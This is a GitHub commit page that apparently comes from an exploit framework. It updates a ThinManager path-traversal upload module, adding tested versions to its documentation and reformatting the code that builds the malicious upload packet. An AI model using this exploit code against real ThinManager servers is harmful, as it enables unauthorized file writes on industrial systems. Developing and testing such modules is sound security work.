Skip to content

Commit 9ab2acc

Browse files
committed
updated
1 parent 60668f3 commit 9ab2acc

File tree

2 files changed

+9
-6
lines changed

2 files changed

+9
-6
lines changed

documentation/modules/auxiliary/admin/networking/thinmanager_traversal_upload2.md

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,10 @@ The software can be obtained from
1313
**Successfully tested on**
1414

1515
- ThinManager v13.1.0 on Windows 22H2
16-
16+
- ThinManager v13.0.1 on Windows 22H2
17+
- ThinManager v12.0.0 on Windows 22H2
18+
- ThinManager v12.1.5 on Windows 22H2
19+
- ThinManager v12.0.4 on Windows 22H2
1720

1821
## Verification Steps
1922

modules/auxiliary/admin/networking/thinmanager_traversal_upload2.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -121,14 +121,14 @@ def run
121121
begin
122122
data = [0xaa].pack('N')
123123
data << [0xbb].pack('N')
124-
data << full_path + "\x00"
125-
data << "file_type\x00"
124+
data << full_path + "\x00"
125+
data << "file_type\x00"
126126
data << "unk_str3\x00"
127127
data << "unk_str4\x00"
128-
data << [file_data.length].pack('N')
129128
data << [file_data.length].pack('N')
130-
data << file_data
131-
data.force_encoding('ASCII-8BIT')
129+
data << [file_data.length].pack('N')
130+
data << file_data
131+
data.force_encoding('ASCII-8BIT')
132132

133133
req = mk_msg(38, 0x0021, data)
134134
rescue StandardError => e

0 commit comments

Comments
 (0)